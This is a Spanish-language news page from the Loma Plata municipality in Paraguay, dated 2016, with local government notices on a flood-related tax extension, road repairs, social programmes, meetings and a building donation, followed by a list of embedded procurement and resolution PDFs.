La intendencia Municipal de Loma Plata comunica que: por Resolución Nº 41/2016 de la Honorable Junta Municipal se establece una  prorroga sin multa para el pago del IMPUESTO INMOBILIARIO en el casco urbano de Loma Plata por la situación de inundación que está afectando la zona. Los contribuyentes  podrán abonar sus impuestos hasta el 1 de agosto del 2016,  sin recargo alguno.

 

Publicado:28.04.16

Inician trabajo de reparación de caminos en Loma Plata.

DSC00410

A partir de la fecha inician los trabajos de reparación de los caminos vecinales en el Distrito de Loma Plata, la tarea comenzó en el Barrio Residencial Sur. La labor se realizan gracias a la  cooperación interinstitucional entre la Municipalidad de Loma Plata y la Gobernación de Boquerón.

Los trabajos consiste en perfiladas de todas las calles de dicho barrio ya mencionada más arriba y posteriormente la maquina se trasladara a la comunidad indígena de Pesempoo.

Así mismo se tiene previsto realizar trabajos en Villa Boquerón, San Miguel y  Urundey de la zona de Cruce Boquerón.

Para los trabajos la Gobernación pone a disposición una motoniveladora con operador y la Municipalidad con combustibles.

La última precipitación caída en el departamento de Boquerón y en especial en el Distrito de Loma Plata ha destrozado varios de los caminos vecinales y con la cooperación de estas dos instituciones se busca solucionar los problemas viales.

 

SEGUIMOS TRABAJANDO EN COOPERACIÓN A FAVOR DE LA CIUDADANÍA.

 Publicado: 27.04.16

Tekopora llega en el Distrito de Loma Plata.

Esta mañana se realizó la presentación del programa Tekopora de la Secretaría de Acción Social  en la comunidad de Yalve Sanga del Distrito de Loma Plata. En la presentación estuvo presente el intendente  de dicha ciudad, Don Walter Stockl, quien pidió a los líderes la buena utilización del aportes monetario que recibirán los beneficiarios del programa.

La apertura y la explicación del programa en sí estuvieron a cargo del Coordinador Departamental en Boquerón, Lic. Charles Zaldívar. En la ocasión participaron los líderes de las diferentes aldeas del Yalve Sanga (Nivacle y Enxlet).

Tekopora es una ayuda económica para familias en situación de pobreza en donde se busca asegurar que los niños de edad escolar puedan asistir en clase. El aporte es de 450.000 guaraníes cada 2 meses por 6 años.

Pesempoo otra comunidad.

El sábado 23 de abril también se realizó la presentación del programa en la comunidad de Pesempoo. Los trabajos estarían comenzando en el mes de mayo realizando el censo familiar.

La Municipalidad de Loma Plata  acompañara el trabajo censal de las familias.

 

Publicado: 27.04.16

Autoridades y  artistas locales reactivan Mesa Cultural en Loma Plata.

DSC00379

Ayer 26 de abril del corriente año autoridades departamentales, distrital y artistas de diferentes géneros se reunieron para la reactivación de la Mesa Cultural Distrital Loma Plata. El ejecutivo municipal manifestó su interés de realizar eventos en donde se aglutinen las diferentes culturas de nuestro distrito. En ese sentido menciono que la municipalidad a partir del segundo semestre del año ya contara con espacio para actividades de esa naturaleza.

Muchas ideas y sueños nacieron durante la reunión como la creación de una Biblioteca Municipal Pública, espacio de exposición de cuadros de artistas plásticas locales y artesanías, además de ferias culturales.

Estuvieron presente el intendente de Loma Plata, Don Walter Stockl, la Secretaria General Sra. Alice Gamarra, la Secretaria de Educación y Cultura Lic. Sara Gaona además y artistas de diferentes géneros.

 

Publicado:26.04.16

MENSAJE ESPECIAL

DÍA DEL PERIODISTA Y SECRETARIA.

DSC00344El Intendente de la Municipalidad de Loma Plata  saluda y felicita a todos los periodistas en este día tan especial así también a todas las personas que ejercen el rol de secretaria tanto en el sector privado como en el público.

El 26 de abril se recuerda el día del Periodista Paraguayo. En esta fecha se recuerda la aparición del primer periódico de nuestro país: “El Paraguayo independiente”, de la mano del Primer Presidente constitucional del Paraguay, don Carlos Antonio López.

Asimismo, esta fecha coincide con el asesinato del periodista Santiago Leguizamón, por sicarios de la mafia, el 26 de abril de 1991 en Pedro Juan Caballero.

La misma fecha se decidió  instaurar para honrar la valiosa labor que desarrolla una secretaria en una oficina. La eficiencia, amabilidad, el buen trato hacia las personas que recurren a una institución, la honestidad, la responsabilidad son algunos de los múltiples valores que caracterizan a las personas que desempeñan este servicio.

A cada uno de los periodistas del Departamento de Boquerón y en especial del Distrito de Loma Plata un cordial saludo, que sigan desempeñando su labor con dedicación enmarcado dentro de la ética y la responsabilidad de informar a la ciudadanía con veracidad.

Muchas felicidades a las personas que con orgullo llevan a cabo la tarea de secretaria para enaltecer la labor de su institución.

Feliz día!!

Mensaje de la Honorable Junta Municipal.

Publicado: 26.04.16

1

MENSAJE POR EL DÍA DEL PERIODISTA.

 La junta municipal de loma plata rinde homenaje y extiende una salutación especial a los periodistas de la zona  en su día, noble responsabilidad la suya, de informar de forma veraz y oportuna a los pueblos en general  y al distrito de loma plata.

 

“26 DE ABRIL, FELIZ DÍA DEL PERIODISTA”

 

Autoridades de Boquerón se reunió con Ministro de Obras Públicas.

Publicada: 21-04-16

DSC00354

Un grupo de autoridades se reunió con el Ministro de Obras Públicas, Ramón Gaona con el objetivo de pedir cooperación de dicha cartera estatal.

Las autoridades chaqueñas presentaron una carpeta de necesidades de los municipios en obras viales como la pavimentación de las calles más importantes de los cascos urbanos. Así mismo reiteraron el pedido de asfaltar la línea norte que une Loma Plata con Filadelfia.

Por su parte el ministro manifestó que existe inversiones millonarias en obras viales para el chaco como la reconstrucción de la ruta Transchaco y la construcción de asfalto del camino que une Loma Plata con Carmelo Peralta, pero, aclaró que el MOPC no tiene previsto la realización de otras inversiones en caminos departamentales o vecinales, dejando de esta manera toda las responsabilidades a la gobernación y municipios.

El grupo de autoridades del Departamento de Boquerón estuvo formado por los Intendentes de Loma Plata, Don Walter Stockl; de Filadelfia, Abog. Holger Bergen; de Mariscal Estigarribia, Don Elmer Vogt; el Gobernador Don Edwin Pauls; Diputado Cornelius Sawaztky y el Secretario de Obras Públicas Julio Benítez.

 

Instituciones locales firman convenio con Obras Públicas.

DSC00196

Ayer se realizó la firma de convenio de cooperación entre la Gobernación de Boquerón, los Municipios de Filadelfia, Loma Plata y Mariscal Estigarribia con el Ministerio de Obra Públicas y Comunicaciones. La firma del documento se realizo en la sede de la Gobernación de Boquerón.

En el documento reza que las instituciones firmantes se comprometen en la cooperación de maquinas, combustibles y personal operarios de maquinas de acuerdo a la capacidad de cada institución.

La firma de este convenio servirá a las instituciones locales Gobernación y Municipios como una herramienta para utilizar y optimizar recursos para el mantenimientos de caminos trocales, ramales y vecinales.

Caminos afectados por las lluvias.

 Tanto el gobernador y los intendentes muestran su interés en priorizar  los caminos de los distritos de Loma Plata y Filadelfia, afectada por las últimas lluvias.

Los gobiernos locales realizaran un informe mensual de los trabajos realizados en los diferentes distritos para el Ministerio de Obras Públicas.

Firmaron dicho documento el Gobernador de Boquerón, Don Edwin Pauls; los Intendentes de Loma Plata, Don Walter Stockl; Filadelfia, Abog. Holger Bergen y de  Mariscal Estigarribia, Don Elmer Vogt. Por su parte el Ministro de Obras Publicas y Comunicaciones Sr. Ramón Jiménez  estampara su firma la semana entrante en su oficina en la ciudad de Asunción.

 

Reunión del Consejo de Desarrollo Municipal Sustentable.

IMG-20160404-WA0003

El viernes último se  reunió el Consejo de Desarrollo Municipal Sustentable, para continuar con el trabajo. En la última reunión se había elaborado el FODA, por lo tanto en esta oportunidad  se han dedicado a la elaboración de la MISIÓN Y LA VISIÓN del Municipio de Loma Plata y los OBJETIVOS por cada Eje Social, Económico y Ambiental, según los resultados obtenidos en el análisis FODA          y de acuerdo con las Estrategias ya establecidas en el  “Plan Nacional de Desarrollo Paraguay 2030”.

MISIÓN: “Crear las condiciones para que los vecinos tengan un desarrollo sostenible integral, atendiendo las necesidades de la sociedad según los fundamentos legales”.

VISIÓN: “Ser la Municipalidad que busca la excelencia integral con la participación Ciudadana”.

La reunión tuvo lugar en la sala de reunión de la Junta Municipal de Loma Plata y participaron el intendente de Loma Plata, Don Walter Stockl; el Concejal Prof. Marcial Ramírez; representante de la Cooperativa Chortitzer; Sr. Norman Toews; representa de organización indígena, Alfredo Lorenzo y funcionarios municipales.

 

Municipalidad realiza limpieza de la avenida central.

1

La Municipalidad de Loma Plata realiza trabajos de limpieza que consiste en retirar las arenas acumuladas sobre la capa asfáltica de la ciudad. La intención de la administración municipal es mantener limpia la avenida central, así también evitar accidentes que puedan ocasionar la acumulación de montículos, especialmente en épocas de lluvias que se vuelve resbaloso.

 

 

 

Intendente de Loma Plata brindó conferencia de prensa por los 100 días de Gobierno Municipal.

Fecha de Publicación: 30.03.2016

2

Esta mañana el intendente de Loma Plata, Don Walter Stockl brindó su conferencia de prensa por los 100 días de gobierno municipal. Uno de los puntos resaltantes es la donación de un inmueble a favor de la Municipalidad por parte de una pareja, el Sr. David Toews y esposa Sra Trudi Toews. En ese sentido manifestó que dicho local será utilizado para la sede municipal.

Otros puntos que resaltó el intendente Don Walter Stockl fueron:

  • Presentación del Plan de Contingencia Ambiental
  • El inicio de los transmite para la apertura y construcción de un Relleno Sanitario Municipal, en ese sentido manifestó que se realiza trabajo en conjunto con la Cooperativa y Asociación Civil Chortitzer.
  • Seguimiento de la adjudicación de casas ante SENAVITAT en Primer Intendente y Ex Algodonera.
  • Conformación de los Consejos Municipal de la Niñez y Consejo de Desarrollo Municipal Sustentable.
  • Fortalecimiento de las Comisiones del Internado Mitakuéra Roga y del Hogar de Ancianos de Villa Boquerón.
  • Acompañamiento al Proyecto Acueducto en la fase de consultas previas y en la preparación de diseño de distribución de agua en Loma Plata y Pesempo’o.

Así mismo el jefe municipal manifestó que desde este año se implementará en el distrito el almuerzo escolar con fondos de FONACIDE, además la construcción de aulas o de comedores escolares respetando el Micro planificación de acuerdo a prioridades.

Igualmente manifestó que se realizará pago de becas a estudiantes universitarios y de mandos medios en el mes de abril.

Acompaño al intendente en  la conferencia el Pdte. de la Junta Municipal Sr. Alex Thiessen, los concejales Sr. Erico Dacosta, Sr. Willi Toewa Dueck, Sr. Heli Ricardo Alegre, Sra. Maria Fernanda Martínez, Sra. Elsa Alevoni Hamann, Sr. Abrahan Toews y Sr Flanklin Klassen. Igualmente estuvieron presentes los donantes del inmueble el Sr. David Toews y esposa Sra Trudi Toews; el intendente de la Ciudad de Filadelfia Abogado Holger Bergen y funcionarios de la institución municipal.

 

Intendente de Loma Plata oficializó donación para la sede de la Municipalidad.

Fecha de publicación: 30.03.16

2En una conferencia de prensa ofrecida esta mañana por el intendente de Loma Plata, Don Walter Stockl anuncio oficialmente la donación de un inmueble a favor de la Municipalidad por parte Sr. David Toews y esposa Sra Trudi Toews. El local está sobre la avenida central y cuenta con superficie de 10.628 m².

El edificio será utilizado para la sede de la Municipalidad de Loma Plata. El intendente agradeció a la pareja Toews por tal noble gesto hacia la institución municipal.

Dicha donación fue aprobada por Resolución Nº 34/2016 de la Junta Municipal de Loma Plata.

Dicho local fue construido para un Shopping y es conocido con ese nombre en dicha ciudad.

DSC00024

Mensaje por Semana Santa y Pascua del Intendente de Loma Plata, Don Walter Stockl.

22.03.16 Mensaje del Señor Intendente.0002

Intendente de Loma Plata mantuvo reunión con referentes de OPS y Ministerio de Salud. 

P1030054

Esta tarde el Intendente de Loma Plata Don Walter Stockl mantuvo una reunión con representantes de la Organización Panamericana de la Salud Dr. Pedro López, Dra. Gladys Flaming; del Ministerio de Salud  Dr. Hugo Valdez, Dr. Wesly Schmidt; y del del Consejo Local de Salud Sra. Elsa Alevoni Hamann de Blaich Pdta. de la misma y la Sra. Juwelita Kavenhowen de Suderman administradora. En la ocasión el Jefe Municipal presentó la situación actual de los puestos asistenciales del distrito.

Actualmente el Consejo Local de Salud administra el Puesto de Salud de Loma Plata ubicada en el barrio Residencial Sur, en ese sentido el intendente manifestó que a través del consejo se busca volver a activar todos los servicios, y en lo posible que dicho nosocomio pueda pasar al rango de Unidad de Salud Familiar (USF) por la cantidad de habitantes y el gran número de pacientes que acude diariamente endicho centro asistencial. Acotó además que se pueda contar con más personal de blanco, equipamientos y  ambulancia.

Por su parte el Dr. López manifestó su deseo de cooperar desde la Organización Panamericana de la Salud y citó que una de la ayuda que puede ofrecer es a través de equipamientos para los puestos.

El puesto de salud local en el mes de febrero alcanzo su pico más alto en atención  llegando a más de mil consultas según datos proveído por el Consejo de Salud Local de Loma Plata.

Actualmente el puesto cuenta con un doctor, licenciada en enfermería y una obstetra, para una población de 2.300 personas aproximadamente.

 

Seminario Taller sobre función de la Junta Municipal.

Fecha de publicación: 18.03.16

Esta mañana se llevó a cabo un seminario taller sobre la función de las Juntas Municipales en la ciudad de Filadelfia. El intendente de la ciudad de Loma Plata, Don Wlater Stockl y los concejales Sr. Alex Thiessen Wiebe Pdte. de la misma, Prof. Marcial Ramírez, Sra. Elsa Alevoni Hamann de Blaich y Sra. María Fernanda Martínez Arguello participaron de dicho seminario.

P1030030Esta iniciativa nació de la Asociación de Juntas Municipales del Paraguay (AJUMPA) en forma conjunta con la Municipalidad de Filadelfia con el objetivo de acompañar y facilitar los procesos de capacitación de los municipios de nuestro país.

Además participaron los intendentes de Filadelfia Abog. Holger Bergen y de Tte. Primero Manuel Irala Fernández Lic. Cecilio López y concejales de los 4 distritos de Chaco Central.

Al cierre del seminario se entregó certificado a cada participante.

 

Conforman Consejo de Desarrollo Municipal en Loma Plata.

Fecha de publicación: 17.03.16

1 Esta tarde se conformo el Consejo de Desarrollo Municipal del Distrito de Loma Plata. De la conformación participaron el Intendente local Don Walter Stockl, Concejales Municipales Sr. AlexThiessen Wiebe Pdte. De la misma, Prof. Marcial Ramírez, representantes de los diferentes sectores de la sociedad de (Cooperativa, comisiones vecinales y líderes indígenas) y funcionarios municipal.

La función de un Consejo de Desarrollo  es cooperar con la administración municipal en la búsqueda de soluciones a los problemas que aqueja a las diferentes comunidades, a través de trabajos mancomunando con las comisiones vecinales. En ese sentido el intendente Don Walter Stockl pidió trabajar juntos a fin de definir las prioridades del distrito.

 

El consejo quedo conformado de esta manera:

Presidente: Don Walter Stockl

Vice presidente: Sr. Norman Toews

Secretaria: Camelia Álvarez

Tesorero: Sr Oscar Sugasti

Es importante mencionar que dicho consejo cuenta con dos síndicos:

Sindico1: Prof. Marcial Ramírez

Sindico2: Elmer Ginter.

Además con 13 miembros titulares representantes de comisiones vecinales, sector indígena, privado, consejo local de salud, educación y funcionarios municipales.

La primera reunión se realizará el día viernes 1 de abril del corriente año en la sede de la Municipalidad para fijar metas y organizar las actividades del año.

 

 

 

Intendente de Loma Plata se reúne con funcionarios de SENAVITAT.

Don Walter Stockl, intendente de la Ciudad de Loma Plata se reunió esta mañana con funcionarios de SENAVITAT, Arq. Lucia Giovine encargada del proyecto, Abog. Adriana Ávila Secretaria General del Área Social para buscar una salida al problema de adjudicación de las viviendas en los fracciones de Primer Intendente y Ex Algodonera. En ese sentido la responsable del proyecto por la SENAVITAT, la Arquitecta Lucia Giovine, manifestó que actualmente 49 familias son los que cumplen los requisitos para ser beneficiado con la entrega de la vivienda.

En otro momento expresó que mucho de los interesados aún no entregó documentos básicos que son requisitos para el estudio minucioso de cada carpeta para su posterior adjudicación.

Regularizar documentación:

Un dato preocupante es la falta de documentación en las diferentes carpetas de los postulantes y otros que aun no realizó su inscripción y ficha social requerida por el programa, por  tal motivo se les pide a las personas que pase a regularizar o consultar sobre su situación  en la Municipalidad de Loma Plata los días viernes 18, lunes 21 y martes 22 de marzo.

Igualmente funcionarios de SENAVITAT estarán realizando trabajos los días martes 29, miércoles 30 y jueves 31 en San Miguel.

Participaron de la reunión los concejales de la Junta Municipal Alex Thiessen Wiebe Presidente de la misma, Érico Dacosta y Prof. Marcial Ramírez, también estuvo la Secretaria General Sra. Alice Gamarra y Sr. Milciades Marmolejos Encargado de la Dirección de Educación.

P1030021

 

Primera reunión  del Consejo Municipal de la Niñez y Adolescencia.

1

El viernes 11 de marzo el Consejo Municipal de la Niñez y Adolescencia mantuvo su primera reunión del año. Don Walter Stockl Intendente de Loma Plata dio la bienvenida a todos los integrantes del consejo seguidamente se dio lectura del acta de la asamblea que fue el día viernes 4 de marzo del corriente año.

Como una de las actividades más importante que tiene en la agenda los integrantes esta la capacitación a niños/as de las diferentes instituciones educativas del distrito sobre la función de los organismos oficiales  responsable de velar sobre los derechos de los más  pequeños por ejemplo­: CODENI, Dirección de la Niñez y la Adolescencia y otras.

Así mismo manifestaron que es importante darle de conocer a los niños/as sobre educación vial y la función de Juzgado de Paz y otras instituciones que realizan trabajos en el sector de la Niñez.

Participaron de dicha reunión la Secretaria General Sra. Alice Gamarra, el Encargado de Educación Milciades Marmolejo, Encargada de CODENI Sra. Dora Bradshaw, Encargada de Mujer Sra. Elvira Villalba  y representantes de las diferentes instituciones que trabajan con los niños. La fecha para la siguiente reunión está marcada para el día 8 de abril del corriente año.

Consejo Departamental de Educación: Coordinan actividades.

3

La Secretaria General Sra. Alice Gamarra y el Encargado de Educación Sr. Milciades Marmolejos de la Municipalidad de Loma Plata participaron de la reunión del Consejo Departamental de Educación  para planificar las actividades del año.

En dicha ocasión brindaron   informes de sus actividades  la Secretaría de Educación de la Gobernación de Boquerón y la Coordinación de Supervisión Educativa Boquerón.

La reunión tuvo lugar en el salón de la Gobernación de Boquerón el día viernes 4 de marzo del corriente año.

Comunicado para toda la Ciudadanía

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/COMUNICADO-DE-SUSPENSION-DE-DIA-DE-AUD.-PDF.pdf»]

Numero de Contacto de Policía Municipal de Transito

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/images.pdf»]

Comunicado de las Distintas Fechas de Vencimientos 

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/COMUNICADO.pdf»]

Resolucion N° 1700/2015

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/RUIDOS-MOLESTOS.pdf»]

Mensaje de Navidad y Año Nuevo

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/MENSAJE-DE-NAVIDAD-Y-AÑO-NUEVO.pdf»]

Aviso para toda la Ciudadanía

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/AVISO.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/DECRETO-RESOLUCION.pdf»]

Certificado de  Aprobación de Gestión Financiera para Gobiernos Departamentales y Municipales orientada al desarrollo local, emitido por la Universidad Nacional de Itapúa

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CERTIFICADO-DE-CESAR.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CERTIFICADO-DE-FAVIOLA.pdf»][gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CERTIFICADO-DE-ANGELA.pdf»]

Presentación de Informe del Segundo Cuatrimestre del ejercicio fiscal 2015

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/f-r-gobernaciones-municipalidades-18-09-15.pdf»]

Códigos de Contrataciones

C.C de Mantenimiento y Reparación de Tractores

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/C.C.-BERGEN.pdf»]

C.C de Obra de Mejoramiento en la Iglesia Cesarea 

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/C.C.-SR.-DIEDRICH-DUECK.1.pdf»]

C.C de Construcción de Muralla Perimetral en Urbanizacion Primer Intendente

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/C.C.-SR.-DIEDRICH-DUECK.pdf»]

C.C de Adquisición de Piedras Trituradas

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/C.C.-SR.-HUMBERTO-DIAZ.pdf»]

C.C de Mantenimiento y Reparación de Tractores

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/C.C.-VALTRA.pdf»]

C.C de Adquisición de Cubiertas

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-BERGEN-S.R.L..pdf»]

C.C de Adquisición de Útiles Varios

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-CASA-LYONS.1.pdf»]

C.C de Adquisición de Insumos de Limpieza

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-CASA-LYONS.pdf»]

C.C de Adquisición de Seguros

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-CENTRAL-DE-SEGUROS.pdf»]

C.C de Adquisición de Combustibles

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-NEUFELD-CIA-S.A..pdf»]

C.C de Mantenimiento y Reparación de Motocicletas

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-ROQUE-SUAREZ.pdf»]

C.C de Mantenimiento y Reparación de Equipos Informáticos

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-SR.-WLADIMIR-LUTZ-FALK.pdf»]

C.C de Mantenimiento y Reparación de Vehículos Municipales

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-TALLER-MOTORMACK.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/codigo-AMPLIACION-MOTORMACK.pdf»]

C.C de Servicio de Rastreo Satelital

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC-WLADIMIR-FALK.1.pdf»]

C.C de Adquisición de Papel con Criterios de Sustentabilidad  e Impresos Varios

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC.-ARTES-GRAFICA-VISUAL.pdf»]

C.C de Impresión de Libro de Reglamento de Transito

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CODIGO-LIBROS.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/codigo-de-ampliación.pdf»]

C.C de Adquisición de Papel con Criterios de Sustentabilidad  e Impresos Varios

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC.-CASA-ARIAS.pdf»]

C.C de Adquisición de Papel con Criterios de Sustentabilidad  e Impresos Varios

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC.-CASA-LYONS.pdf»]

C.C de Mantenimiento y Reparación de Aire Acondicionado

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC.-DELBERT-CHUPP.pdf»]

C.C de Servicio de Gomeria

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CC.-GOMERIA-LEON.pdf»]

C.C de Impresión de Talonario de Levantamiento de Datos en Accidente de Transito

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CODIGO-DE-CONTRATACION.-TALONARIOS.pdf»]

C.C. de Construcción de Obras con Fondo de Fonacide

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CODIGO-DE-OBRAS-FONACIDE.pdf»]

C.C. de Mantenimiento y Reparación de Tractor Valtra

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CODIGO-DE-VALTRA.pdf»]

C.C. de Construcción de un Salón Multiuso tipo Comedor en la Comunidad Abundancia

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/CODIGO.-ABUNDANCIA.pdf»]